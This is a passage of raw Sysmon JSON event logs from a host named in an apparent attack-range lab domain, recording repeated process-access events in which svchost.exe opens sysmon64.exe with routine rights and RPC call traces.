C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:00.003","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2763,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:00.003\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:00.003","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2764,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:00.003\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:00.003","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2765,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:00.003\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:00.003","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2766,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:00.003\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:00.003","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2767,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:00.003\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:00.003","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2768,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:00.003\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:00.003","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2769,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:00.003\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:00.003","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2770,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:00.003\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 